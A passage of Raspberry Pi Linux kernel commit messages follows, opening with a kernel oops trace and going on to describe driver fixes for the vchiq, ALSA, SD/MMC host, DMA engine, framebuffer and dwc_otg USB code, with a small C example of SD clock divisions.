[ 1704.877774] CPU: 2 PID: 3656 Comm: stress-ng-fstat Not tainted 3.19.1-12-generic-bcm2709 #12-Ubuntu
[ 1704.877777] Hardware name: BCM2709
[ 1704.877783] task: b8ab9b00 ti: b7e68000 task.ti: b7e68000
[ 1704.877798] PC is at __down_interruptible+0x50/0xec
[ 1704.877806] LR is at down_interruptible+0x5c/0x68
[ 1704.877813] pc : [<80630ee8>] lr : [<800704b0>] psr: 60080093
sp : b7e69e50 ip : b7e69e88 fp : b7e69e84
[ 1704.877817] r10: b88123c8 r9 : 00000010 r8 : 00000001
[ 1704.877822] r7 : b8ab9b00 r6 : 7fffffff r5 : 80a1cc34 r4 : 80a1cc34
[ 1704.877826] r3 : b7e69e50 r2 : 00000000 r1 : 00000000 r0 : 80a1cc34
[ 1704.877833] Flags: nZCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user
[ 1704.877838] Control: 10c5387d Table: 3899c06a DAC: 00000015
[ 1704.877843] Process do-oops (pid: 3656, stack limit = 0xb7e68238)
[ 1704.877848] Stack: (0xb7e69e50 to 0xb7e6a000)
[ 1704.877856] 9e40: 80a1cc3c 00000000 00000010 b88123c8
[ 1704.877865] 9e60: b7e69e84 80a1cc34 fff9fee9 ffffffff b7e68000 00000009 b7e69ea4 b7e69e88
[ 1704.877874] 9e80: 800704b0 80630ea4 fff9fee9 60080013 80a1cc28 fff9fee9 b7e69edc b7e69ea8
[ 1704.877884] 9ea0: 8040f558 80070460 fff9fee9 ffffffff 00000000 00000000 00000009 80a1cb7c
[ 1704.877893] 9ec0: 00000000 80a1cb7c 00000000 00000010 b7e69ef4 b7e69ee0 803e1ba4 8040f514
[ 1704.877902] 9ee0: 00000e48 80a1cb7c b7e69f14 b7e69ef8 803e1c9c 803e1b74 b88123c0 b92acb18
[ 1704.877911] 9f00: b8812790 b8d815d8 b7e69f24 b7e69f18 803e2250 803e1bc8 b7e69f5c b7e69f28
[ 1704.877921] 9f20: 80167bac 803e222c 00000000 00000000 b7e69f54 b8ab9ffc 00000000 8098c794
[ 1704.877930] 9f40: b8ab9b00 8000efc4 b7e68000 00000000 b7e69f6c b7e69f60 80167d6c 80167b28
[ 1704.877939] 9f60: b7e69f8c b7e69f70 80047d38 80167d60 b7e68000 b7e68010 8000efc4 b7e69fb0
[ 1704.877949] 9f80: b7e69fac b7e69f90 80012820 80047c84 01155490 011549a8 00000001 00000006
[ 1704.877957] 9fa0: 00000000 b7e69fb0 8000ee5c 80012790 00000000 353d8c0f 7efc4308 00000000
[ 1704.877966] 9fc0: 01155490 011549a8 00000001 00000006 00000000 00000000 76cf3ba0 00000003
[ 1704.877975] 9fe0: 00000000 7efc42e4 0002272f 76e2ed66 60080030 00000003 00000000 00000000
[ 1704.877998] [<80630ee8>] (__down_interruptible) from [<800704b0>] (down_interruptible+0x5c/0x68)
[ 1704.878015] [<800704b0>] (down_interruptible) from [<8040f558>] (vchiu_queue_push+0x50/0xd8)
[ 1704.878032] [<8040f558>] (vchiu_queue_push) from [<803e1ba4>] (send_worker_msg+0x3c/0x54)
[ 1704.878045] [<803e1ba4>] (send_worker_msg) from [<803e1c9c>] (vc_cma_set_reserve+0xe0/0x1c4)
[ 1704.878057] [<803e1c9c>] (vc_cma_set_reserve) from [<803e2250>] (vc_cma_release+0x30/0x38)
[ 1704.878069] [<803e2250>] (vc_cma_release) from [<80167bac>] (__fput+0x90/0x1e0)
[ 1704.878082] [<80167bac>] (__fput) from [<80167d6c>] (____fput+0x18/0x1c)
[ 1704.878094] [<80167d6c>] (____fput) from [<80047d38>] (task_work_run+0xc0/0xf8)
[ 1704.878109] [<80047d38>] (task_work_run) from [<80012820>] (do_work_pending+0x9c/0xc4)
[ 1704.878123] [<80012820>] (do_work_pending) from [<8000ee5c>] (work_pending+0xc/0x20)
[ 1704.878133] Code: e50b1034 e3a01000 e50b2030 e580300c (e5823000)
The fix is to ensure that we have actually initialized the queue before we attempt
to push any items onto it. This occurs if we do an open() followed by a close() without
any activity in between.
Signed-off-by: Colin Ian King <colin.king@canonical.com>
vchiq_arm: Sort out the vmalloc case
See: https://github.com/raspberrypi/linux/issues/1055
vchiq: hack: Add deprecated dma include file
vchiq_arm: Tweak the logging output
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
vchiq_arm: Access the dequeue_pending flag locked
Reading through this code looking for another problem (now found in userland)
the use of dequeue_pending outside a lock didn't seem safe.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
vchiq_arm: Service callbacks must not fail
Service callbacks are not allowed to return an error. The internal callback
that delivers events and messages to user tasks does not enqueue them if
the service is closing, but this is not an error and should not be
reported as such.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
vchiq_arm: do not use page_cache_release(page) macro (#1403)
This macro is gone since 1fa64f198b.
Signed-off-by: Slawomir Stepien <sst@poczta.fm>
vchiq: Update to match get_user_pages prototype
vchiq_arm: Add completion records under the mutex
An issue was observed when flushing openmax components
which generate a large number of messages returning
buffers to host.
We occasionally found a duplicate message from 16
messages prior, resulting in a buffer returned twice.
While only one thread adds completions, without the
mutex you don't get the implicit memory barrier
that synchronisation objects provide.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Signed-off-by: popcornmix <popcornmix@gmail.com>
alsa: add mmap support and some cleanups to bcm2835 ALSA driver
snd-bcm2835: Add support for spdif/hdmi passthrough
This adds a dedicated subdevice which can be used for passthrough of non-audio
formats (i.e. encoded A52) through the HDMI audio link. In addition to this
driver extension an appropriate card config is required to make alsa-lib
support the AES parameters for this device.
snd-bcm2708: Add mutex, improve logging
Fix for ALSA driver crash
Avoids an issue when closing and opening vchiq where a message can arrive before the service handle has been written.
alsa: reduce severity of expected warning message
snd-bcm2708: Fix dmesg spam for non-error case
alsa: Ensure mutexes are released through error paths
alsa: Make interrupted close paths quieter
BCM270x: Add onboard sound device to Device Tree
Add Device Tree support to alsa driver.
Add device to Device Tree.
Don't add platform devices when booting in DT mode.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2835: access controls under the audio mutex
I don't think the ALSA framework provides any kind of automatic
synchronization within the control callbacks. We most likely need
to ensure this manually, so add locking around all access to shared
mutable data. In particular, bcm2835_audio_set_ctls() should
probably always be called under our own audio lock.
snd-bcm2835: Don't allow responses from VC to be interrupted by user signals
There should always be a response, and retrying after a signal interruption is not handled, so don't report
that we are interruptible.
See: https://github.com/raspberrypi/linux/issues/1560
snd-bcm2835: Use bcm2835_hw params in preallocate
Signed-off-by: popcornmix <popcornmix@gmail.com>
vc_cma: Make the vc_cma area the default contiguous DMA area
vc_cma: Provide empty functions when module is not built
Providing empty functions saves the users from guarding the
function call with an #if clause.
Move __init markings from prototypes to functions.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Some SD cards have been found that corrupt data when small blocks
are erased. Add a quirk to indicate that ERASE should not be used,
and set it for cards of that type.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
mmc: Apply QUIRK_BROKEN_ERASE to other capacities
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
mmc: Add card_quirks module parameter, log quirks
Use mmc_block.card_quirks to override the quirks for all SD or MMC
cards. The value is a bitfield using the bit positions defined in
include/linux/mmc/card.h. If the module parameter is placed in the
kernel command line (or bootargs) stored on the card then, assuming the
device only has one SD card interface, the override effectively becomes
card-specific.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
BCM2835 has two SD card interfaces. This driver uses the other one.
bcm2835-sdhost: Error handling fix, and code clarification
bcm2835-sdhost: Adding overclocking option
Allow a different clock speed to be substituted for a requested 50MHz.
This option is exposed using the "overclock_50" DT parameter.
Note that the sdhost interface is restricted to integer divisions of
core_freq, and the highest sensible option for a core_freq of 250MHz
is 84 (250/3 = 83.3MHz), the next being 125 (250/2) which is much too
high.
Use at your own risk.
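To illustrate the integer-division restriction, a tiny stand-alone C example
listing the clocks reachable from a 250MHz core (numbers as quoted above;
nothing here is driver code):
#include <stdio.h>

int main(void)
{
        const double core_mhz = 250.0;

        /* The sdhost clock is core_freq / n for integer n, so the choices
         * around 50 MHz are coarse: overclock_50=84 lands on 250/3 = 83.3 MHz,
         * and the next step up, 250/2 = 125 MHz, is much too high. */
        for (int div = 2; div <= 6; div++)
                printf("core/%d = %.1f MHz\n", div, core_mhz / div);
        return 0;
}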
bcm2835-sdhost: Round up the overclock, so 62 works for 62.5MHz
Also only warn once for each overclock setting.
bcm2835-sdhost: Improve error handling and recovery
1) Expose the hw_reset method to the MMC framework, removing many
internal calls by the driver.
2) Reduce overclock setting on error.
3) Increase timeout to cope with high capacity cards.
4) Add properties and parameters to control pio_limit and debug.
5) Reduce messages at probe time.
bcm2835-sdhost: Further improve overclock back-off
bcm2835-sdhost: Clear HBLC for PIO mode
Also update pio_limit default in overlay README.
bcm2835-sdhost: Add the ERASE capability
See: https://github.com/raspberrypi/linux/issues/1076
bcm2835-sdhost: Ignore CRC7 for MMC CMD1
It seems that the sdhost interface returns CRC7 errors for CMD1,
which is the MMC-specific SEND_OP_COND. Returning these errors to
the MMC layer causes a downward spiral, but ignoring them seems
to be harmless.
bcm2835-mmc/sdhost: Remove ARCH_BCM2835 differences
The bcm2835-mmc driver (and the -sdhost driver that was copied from it)
contains code to handle SDIO interrupts in a threaded interrupt
handler rather than waking the MMC framework thread. The change
follows a patch from Russell King that adds the facility as the
preferred way of working.
However, the new code path is only present in ARCH_BCM2835
builds, which I have taken to be a way of testing the waters
rather than making the change across the board; I can't see
any technical reason why it wouldn't be enabled for MACH_BCM270X
builds. So this patch standardises on the ARCH_BCM2835 code,
removing the old code paths.
bcm2835-sdhost: Don't log timeout errors unless debug=1
The MMC card-discovery process generates timeouts. This is
expected behaviour, so reporting it to the user serves no purpose.
Suppress the reporting of timeout errors unless the debug flag
is on.
bcm2835-sdhost: Add workaround for odd behaviour on some cards
For reasons not understood, the sdhost driver fails when reading
sectors very near the end of some SD cards. The problem could
be related to the similar issue that reading the final sector
of any card as part of a multiple read never completes, and the
workaround is an extension of the mechanism introduced to solve
that problem which ensures those sectors are always read singly.
bcm2835-sdhost: Major revision
This is a significant revision of the bcm2835-sdhost driver. It
improves on the original in a number of ways:
1) Through the use of CMD23 for reads it appears to avoid problems
reading some sectors on certain high speed cards.
2) Better atomicity to prevent crashes.
3) Higher performance.
4) Activity logging included, for easier diagnosis in the event
of a problem.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Restore ATOMIC flag to PIO sg mapping
Allocation problems have been seen in a wireless driver, and
this is the only change which might have been responsible.
SQUASH: bcm2835-sdhost: Only claim one DMA channel
With both MMC controllers enabled there are few DMA channels left. The
bcm2835-sdhost driver only uses DMA in one direction at a time, so it
doesn't need to claim two channels.
See: https://github.com/raspberrypi/linux/issues/1327
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Workaround for "slow" sectors
Some cards have been seen to cause timeouts after certain sectors are
read. This workaround enforces a minimum delay between the stop after
reading one of those sectors and a subsequent data command.
Using CMD23 (SET_BLOCK_COUNT) avoids this problem, so good cards will
not be penalised by this workaround.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Firmware manages the clock divisor
The bcm2835-sdhost driver hands control of the CDIV clock divisor
register to matching firmware, allowing it to adjust to a changing
core clock. This removes the need to use the performance governor or
to enable io_is_busy on the on-demand governor in order to get the
best SD performance.
N.B. As SD clocks must be an integer divisor of the core clock, it is
possible that the SD clock for "turbo" mode can be different (even
lower) than "normal" mode.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Reset the clock in task context
Since reprogramming the clock can now involve a round-trip to the
firmware it must not be done in atomic context, and a tasklet
is not a task.
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
bcm2835-sdhost: Don't exit cmd wait loop on error
The FAIL flag can be set in the CMD register before command processing
is complete, leading to spurious "failed to complete" errors. This has
the effect of promoting harmless CRC7 errors during CMD1 processing
into errors that can delay and even prevent booting.
Also:
1) Convert the last KERN_ERROR message in the register dumping to
KERN_INFO.
2) Remove an unnecessary reset call from bcm2835_sdhost_add_host.
See: https://github.com/raspberrypi/linux/pull/1492
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
mmc: Disable CMD23 transfers on all cards
Pending wire-level investigation of these types of transfers
and associated errors on bcm2835-mmc, disable for now. Fallback of
CMD18/CMD25 transfers will be used automatically by the MMC layer.
Reported/Tested-by: Gellert Weisz <gellert@raspberrypi.org>
mmc: bcm2835-mmc: enable DT support for all architectures
Both ARCH_BCM2835 and ARCH_BCM270x are built with OF now.
Enable Device Tree support for all architectures.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
mmc: bcm2835-mmc: fix probe error handling
Probe error handling is broken in several places.
Simplify error handling by using device managed functions.
Replace pr_{err,info} with dev_{err,info}.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2835-mmc: Add locks when accessing sdhost registers
bcm2835-mmc: Add range of debug options for slowing things down
bcm2835-mmc: Add option to disable some delays
bcm2835-mmc: Add option to disable MMC_QUIRK_BLK_NO_CMD23
bcm2835-mmc: Default to disabling MMC_QUIRK_BLK_NO_CMD23
bcm2835-mmc: Adding overclocking option
Allow a different clock speed to be substituted for a requested 50MHz.
This option is exposed using the "overclock_50" DT parameter.
Note that the mmc interface is restricted to EVEN integer divisions of
250MHz, and the highest sensible option is 63 (250/4 = 62.5), the
next being 125 (250/2) which is much too high.
Use at your own risk.
bcm2835-mmc: Round up the overclock, so 62 works for 62.5MHz
Also only warn once for each overclock setting.
mmc: bcm2835-mmc: Make available on ARCH_BCM2835
Make the bcm2835-mmc driver available for use on ARCH_BCM2835.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
BCM270x_DT: add bcm2835-mmc entry
Add Device Tree entry for bcm2835-mmc.
In non-DT mode, don't add the device in the board file.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2835-mmc: Don't overwrite MMC capabilities from DT
bcm2835-mmc: Don't override bus width capabilities from devicetree
Take out the force setting of the MMC_CAP_4_BIT_DATA host capability
so that the result read from devicetree via mmc_of_parse() is
preserved.
bcm2835-mmc: Only claim one DMA channel
With both MMC controllers enabled there are few DMA channels left. The
bcm2835-mmc driver only uses DMA in one direction at a time, so it
doesn't need to claim two channels.
See: https://github.com/raspberrypi/linux/issues/1327
Signed-off-by: Phil Elwell <phil@raspberrypi.org>
Add support for DMA controller of BCM2708 as used in the Raspberry Pi.
Currently it only supports cyclic DMA.
Signed-off-by: Florian Meier <florian.meier@koalo.de>
dmaengine: expand functionality by supporting scatter/gather transfers
sdhci-bcm2708 and dma.c: fix for LITE channels
DMA: fix cyclic LITE length overflow bug
dmaengine: bcm2708: Remove chancnt affectations
Mirror bcm2835-dma.c commit 9eba5536a7:
chancnt is already filled by dma_async_device_register, which uses the channel
list to know how many channels there are.
Since it's already filled, we can safely remove it from the drivers' probe
function.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: overwrite dreq only if it is not set
dreq is set when the DMA channel is fetched from Device Tree.
slave_id is set using dmaengine_slave_config().
Only overwrite dreq with slave_id if it is not set.
dreq/slave_id in the cyclic DMA case is not touched, because I don't
have hardware to test with.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: do device registration in the board file
Don't register the device in the driver. Do it in the board file.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: don't restrict DT support to ARCH_BCM2835
Both ARCH_BCM2835 and ARCH_BCM270x are built with OF now.
Add Device Tree support to the non ARCH_BCM2835 case.
Use the same driver name regardless of architecture.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
BCM270x_DT: add bcm2835-dma entry
Add Device Tree entry for bcm2835-dma.
The entry doesn't contain any resources since they are handled
by the arch/arm/mach-bcm270x/dma.c driver.
In non-DT mode, don't add the device in the board file.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2708-dmaengine: Add debug options
BCM270x: Add memory and irq resources to dmaengine device and DT
Prepare for merging of the legacy DMA API arch driver dma.c
with bcm2708-dmaengine by adding memory and irq resources both
to platform file device and Device Tree node.
Don't use BCM_DMAMAN_DRIVER_NAME so we don't have to include mach/dma.h
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: Merge with arch dma.c driver and disable dma.c
Merge the legacy DMA API driver with bcm2708-dmaengine.
This is done so we can use bcm2708_fb on ARCH_BCM2835 (mailbox
driver is also needed).
Changes to the dma.c code:
- Use BIT() macro.
- Cutdown some comments to one line.
- Add mutex to vc_dmaman and use this, since the dev lock is locked
during probing of the engine part.
- Add global g_dmaman variable since drvdata is used by the engine part.
- Restructure for readability:
vc_dmaman_chan_alloc()
vc_dmaman_chan_free()
bcm_dma_chan_free()
- Restructure bcm_dma_chan_alloc() to simplify error handling.
- Use device irq resources instead of hardcoded bcm_dma_irqs table.
- Remove dev_dmaman_register() and code it directly.
- Remove dev_dmaman_deregister() and code it directly.
- Simplify bcm_dmaman_probe() using devm_* functions.
- Get dmachans from DT if available.
- Keep 'dma.dmachans' module argument name for backwards compatibility.
Make it available on ARCH_BCM2835 as well.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: set residue_granularity field
bcm2708-dmaengine supports residue reporting at burst level
but didn't report this via the residue_granularity field.
Without this field set properly we get playback issues with I2S cards.
dmaengine: bcm2708-dmaengine: Fix memory leak when stopping a running transfer
bcm2708-dmaengine: Use more DMA channels (but not 12)
1) Only the bcm2708_fb driver uses the legacy DMA API, and
it requires a BULK-capable channel, so all other types
(FAST, NORMAL and LITE) can be made available to the regular
DMA API.
2) DMA channels 11-14 share an interrupt. The driver can't
handle this, so don't use channels 12-14 (12 was used, probably
because it appears to have an interrupt, but in reality that
interrupt is for activity on ANY channel). This may explain
a lockup encountered when running out of DMA channels.
The combined effect of this patch is to leave 7 DMA channels
available + channel 0 for bcm2708_fb via the legacy API.
See: https://github.com/raspberrypi/linux/issues/1110
See: https://github.com/raspberrypi/linux/issues/1108
dmaengine: bcm2708: Make legacy API available for bcm2835-dma
bcm2708_fb uses the legacy DMA API, so in order to start using
bcm2835-dma, bcm2835-dma has to support the legacy API. Make this
possible by exporting bcm_dmaman_probe() and bcm_dmaman_remove().
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: Change DT compatible string
Both bcm2835-dma and bcm2708-dmaengine have the same compatible string.
So change compatible to "brcm,bcm2708-dma".
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
dmaengine: bcm2708: Remove driver but keep legacy API
Dropping non-DT support means we don't need this driver,
but we still need the legacy DMA API.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
bcm2708-dmaengine - Fix arm64 portability/build issues
Signed-off-by: popcornmix <popcornmix@gmail.com>
bcm2708_fb : Implement blanking support using the mailbox property interface
bcm2708_fb: Add pan and vsync controls
bcm2708_fb: DMA acceleration for fb_copyarea
Based on http://www.raspberrypi.org/phpBB3/viewtopic.php?p=62425#p62425
Also used Simon's dmaer_master module as a reference for tweaking DMA
settings for better performance.
For now busylooping only. IRQ support might be added later.
With non-overclocked Raspberry Pi, the performance is ~360 MB/s
for simple copy or ~260 MB/s for two-pass copy (used when dragging
windows to the right).
In the case of using DMA channel 0, the performance improves
to ~440 MB/s.
For comparison, VFP optimized CPU copy can only do ~114 MB/s in
the same conditions (hindered by reading uncached source buffer).
Signed-off-by: Siarhei Siamashka <siarhei.siamashka@gmail.com>
bcm2708_fb: report number of dma copies
Add a counter (exported via debugfs) reporting the
number of dma copies that the framebuffer driver
has done, in order to help evaluate different
optimization strategies.
Signed-off-by: Luke Diamand <luked@broadcom.com>
bcm2708_fb: use IRQ for DMA copies
The copyarea ioctl() uses DMA to speed things along. This
was busy-waiting for completion. This change supports using
an interrupt instead for larger transfers. For small
transfers, busy-waiting is still likely to be faster.
Signed-off-by: Luke Diamand <luke@diamand.org>
bcm2708: Make ioctl logging quieter
video: fbdev: bcm2708_fb: Don't panic on error
No need to panic the kernel if the video driver fails.
Just print a message and return an error.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
fbdev: bcm2708_fb: Add ARCH_BCM2835 support
Add Device Tree support.
Pass the device to dma_alloc_coherent() in order to get the
correct bus address on ARCH_BCM2835.
Use the new DMA legacy API header file.
Including <mach/platform.h> is not necessary.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
BCM270x_DT: Add bcm2708-fb device
Add bcm2708-fb to Device Tree and don't add the
platform device when booting in DT mode.
Signed-off-by: Noralf Trønnes <noralf@tronnes.org>
Signed-off-by: popcornmix <popcornmix@gmail.com>
usb: dwc: fix lockdep false positive
Signed-off-by: Kari Suvanto <karis79@gmail.com>
usb: dwc: fix inconsistent lock state
Signed-off-by: Kari Suvanto <karis79@gmail.com>
Add FIQ patch to dwc_otg driver. Enable with dwc_otg.fiq_fix_enable=1. Should give about 10% more ARM performance.
Thanks to Gordon and Costas
Avoid dynamic memory allocation for channel lock in USB driver. Thanks ddv2005.
Add NAK holdoff scheme. Enabled by default, disable with dwc_otg.nak_holdoff_enable=0. Thanks gsh
Make sure we wait for the reset to finish
dwc_otg: fix bug in dwc_otg_hcd.c resulting in silent kernel
memory corruption, escalating to OOPS under high USB load.
dwc_otg: Fix unsafe access of QTD during URB enqueue
In dwc_otg_hcd_urb_enqueue during qtd creation, it was possible that the
transaction could complete almost immediately after the qtd was assigned
to a host channel during URB enqueue, which meant the qtd pointer was no
longer valid having been completed and removed. Usually, this resulted in
an OOPS during URB submission. By predetermining whether transactions
need to be queued or not, this unsafe pointer access is avoided.
This bug was only evident on the Pi model A where a device was attached
that had no periodic endpoints (e.g. USB pendrive or some wlan devices).
dwc_otg: Fix incorrect URB allocation error handling
If the memory allocation for a dwc_otg_urb failed, the kernel would OOPS
because for some reason a member of the *unallocated* struct was set to
zero. Error handling changed to fail correctly.
dwc_otg: fix potential use-after-free case in interrupt handler
If a transaction had previously aborted, certain interrupts are
enabled to track error counts and reset where necessary. On IN
endpoints the host generates an ACK interrupt near-simultaneously
with completion of transfer. In the case where this transfer had
previously had an error, this results in a use-after-free on
the QTD memory space with a 1-byte length being overwritten to
0x00.
dwc_otg: add handling of SPLIT transaction data toggle errors
Previously a data toggle error on packets from a USB1.1 device behind
a TT would result in the Pi locking up as the driver never handled
the associated interrupt. Patch adds basic retry mechanism and
interrupt acknowledgement to cater for either a chance toggle error or
for devices that have a broken initial toggle state (FT8U232/FT232BM).
dwc_otg: implement tasklet for returning URBs to usbcore hcd layer
The dwc_otg driver interrupt handler for transfer completion will spend
a very long time with interrupts disabled when a URB is completed -
this is because usb_hcd_giveback_urb is called from within the handler
which for a USB device driver with complicated processing (e.g. webcam)
will take an exorbitant amount of time to complete. This results in
missed completion interrupts for other USB packets which lead to them
being dropped due to microframe overruns.
This patch splits returning the URB to the usb hcd layer into a
high-priority tasklet. This will have most benefit for isochronous IN
transfers but will also have incidental benefit where multiple periodic
devices are active at once.
dwc_otg: fix NAK holdoff and allow on split transactions only
This corrects a bug where if a single active non-periodic endpoint
had at least one transaction in its qh, on frnum == MAX_FRNUM the qh
would get skipped and never get queued again. This would result in
a silent device until error detection (automatic or otherwise) would
either reset the device or flush and requeue the URBs.
Additionally the NAK holdoff was enabled for all transactions - this
would potentially stall a HS endpoint for 1ms if a previous error state
enabled this interrupt and the next response was a NAK. Fix so that
only split transactions get held off.
dwc_otg: Call usb_hcd_unlink_urb_from_ep with lock held in completion handler
usb_hcd_unlink_urb_from_ep must be called with the HCD lock held. Calling it
asynchronously in the tasklet was not safe (regression in
c4564d4a1a).
This change unlinks it from the endpoint prior to queueing it for handling in
the tasklet, and also adds a check to ensure the urb is OK to be unlinked
before doing so.
NULL pointer dereference kernel oopses had been observed in usb_hcd_giveback_urb
when a USB device was unplugged/replugged during data transfer. This effect
was reproduced using automated USB port power control, hundreds of replug
events were performed during active transfers to confirm that the problem was
eliminated.
USB fix using a FIQ to implement split transactions
This commit adds a FIQ implementation that schedules
the split transactions using a FIQ so that we don't get
held off by the interrupt latency of Linux.
dwc_otg: fix device attributes and avoid kernel warnings on boot
dwc_otg: avoid logging function that can cause panics
See: https://github.com/raspberrypi/firmware/issues/21
Thanks to cleverca22 for fix
dwc_otg: mask correct interrupts after transaction error recovery
The dwc_otg driver will unmask certain interrupts on a transaction
that previously halted in the error state in order to reset the
QTD error count. The various fine-grained interrupt handlers do not
consider that other interrupts besides themselves were unmasked.
By disabling the two other interrupts only ever enabled in DMA mode
for this purpose, we can avoid unnecessary function calls in the
IRQ handler. This will also prevent an unnecessary FIQ interrupt
from being generated if the FIQ is enabled.
dwc_otg: fiq: prevent FIQ thrash and incorrect state passing to IRQ
In the case of a transaction to a device that had previously aborted
due to an error, several interrupts are enabled to reset the error
count when a device responds. This has the side-effect of making the
FIQ thrash because the hardware will generate multiple instances of
a NAK on an IN bulk/interrupt endpoint and multiple instances of ACK
on an OUT bulk/interrupt endpoint. Make the FIQ mask and clear the
associated interrupts.
Additionally, on non-split transactions make sure that only unmasked
interrupts are cleared. This caused a hard-to-trigger but serious
race condition when you had the combination of an endpoint awaiting
error recovery and a transaction completed on an endpoint - due to
the sequencing and timing of interrupts generated by the dwc_otg core,
it was possible to confuse the IRQ handler.
Fix function tracing
dwc_otg: whitespace cleanup in dwc_otg_urb_enqueue
dwc_otg: prevent OOPSes during device disconnects
The dwc_otg_urb_enqueue function is thread-unsafe. In particular the
access of urb->hcpriv, usb_hcd_link_urb_to_ep, dwc_otg_urb->qtd and
friends does not occur within a critical section and so if a device
was unplugged during activity there was a high chance that the
usbcore hub_thread would try to disable the endpoint with partially-
formed entries in the URB queue. This would result in BUG() or null
pointer dereferences.
Fix so that access of urb->hcpriv, enqueuing to the hardware and
adding to usbcore endpoint URB lists is contained within a single
critical section.
dwc_otg: prevent BUG() in TT allocation if hub address is > 16
A fixed-size array is used to track TT allocation. This was
previously set to 16 which caused a crash because
dwc_otg_hcd_allocate_port would read past the end of the array.
This was hit if a hub was plugged in which enumerated as addr > 16,
due to previous device resets or unplugs.
Also add #ifdef FIQ_DEBUG around hcd->hub_port_alloc[], which grows
to a large size if 128 hub addresses are supported. This field is
for debug only, tracking which frame an allocation happened in.
dwc_otg: make channel halts with unknown state less damaging
If the IRQ received a channel halt interrupt through the FIQ
with no other bits set, the IRQ would not release the host
channel and never complete the URB.
Add catchall handling to treat as a transaction error and retry.
dwc_otg: fiq_split: use TTs with more granularity
This fixes certain issues with split transaction scheduling.
- Isochronous multi-packet OUT transactions now hog the TT until
they are completed - this prevents hubs aborting transactions
if they get a periodic start-split out-of-order
- Don't perform TT allocation on non-periodic endpoints - this
allows simultaneous use of the TT's bulk/control and periodic
transaction buffers
This commit will mainly affect USB audio playback.
dwc_otg: fix potential sleep while atomic during urb enqueue
Fixes a regression introduced with eb1b482a. Kmalloc called from
dwc_otg_hcd_qtd_add / dwc_otg_hcd_qtd_create did not always have
the GFP_ATOMIC flag set. Force this flag when inside the larger
critical section.
dwc_otg: make fiq_split_enable imply fiq_fix_enable
Failing to set up the FIQ correctly would result in
"IRQ 32: nobody cared" errors in dmesg.
dwc_otg: prevent crashes on host port disconnects
Fix several issues resulting in crashes or inconsistent state
if a Model A root port was disconnected.
- Clean up queue heads properly in kill_urbs_in_qh_list by
removing the empty QHs from the schedule lists
- Set the halt status properly to prevent IRQ handlers from
using freed memory
- Add fiq_split related cleanup for saved registers
- Make microframe scheduling reclaim host channels if
active during a disconnect
- Abort URBs with -ESHUTDOWN status response, informing
device drivers so they respond in a more correct fashion
and don't try to resubmit URBs
- Prevent IRQ handlers from attempting to handle channel
interrupts if the associated URB was dequeued (and the
driver state was cleared)
dwc_otg: prevent leaking URBs during enqueue
A dwc_otg_urb would get leaked if the HCD enqueue function
failed for any reason. Free the URB at the appropriate points.
dwc_otg: Enable NAK holdoff for control split transactions
Certain low-speed devices take a very long time to complete a
data or status stage of a control transaction, producing NAK
responses until they complete internal processing - the USB2.0
spec limit is up to 500 ms. This causes the same type of interrupt
storm as seen with USB-serial dongles prior to c8edb238.
In certain circumstances, usually while booting, this interrupt
storm could cause SD card timeouts.
dwc_otg: Fix for occasional lockup on boot when doing a USB reset
dwc_otg: Don't issue traffic to LS devices in FS mode
Issuing low-speed packets when the root port is in full-speed mode
causes the root port to stop responding. Explicitly fail when
enqueuing URBs to a LS endpoint on a FS bus.
Fix ARM architecture issue with local_irq_restore()
If local_fiq_enable() is called before a local_irq_restore(flags) where
the flags variable has the F bit set, the FIQ will be erroneously disabled.
Fixup arch_local_irq_restore to avoid trampling the F bit in CPSR.
Also fix some of the hacks previously implemented for previous dwc_otg
incarnations.
dwc_otg: fiq_fsm: Base commit for driver rewrite
This commit removes the previous FIQ fixes entirely and adds fiq_fsm.
This rewrite features much more complete support for split transactions
and takes into account several OTG hardware bugs. High-speed
isochronous transactions are also capable of being performed by fiq_fsm.
All driver options have been removed and replaced with:
- dwc_otg.fiq_enable (bool)
- dwc_otg.fiq_fsm_enable (bool)
- dwc_otg.fiq_fsm_mask (bitmask)
- dwc_otg.nak_holdoff (unsigned int)
Defaults are specified such that fiq_fsm behaves similarly to the
previously implemented FIQ fixes.
fiq_fsm: Push error recovery into the FIQ when fiq_fsm is used
If the transfer associated with a QTD failed due to a bus error, the HCD
would retry the transfer up to 3 times (implementing the USB2.0
three-strikes retry in software).
Due to the masking mechanism used by fiq_fsm, it is only possible to pass
a single interrupt through to the HCD per-transfer.
In this instance host channels would fall off the radar because the error
reset would function, but the subsequent channel halt would be lost.
Push the error count reset into the FIQ handler.
fiq_fsm: Implement timeout mechanism
For full-speed endpoints with a large packet size, interrupt latency
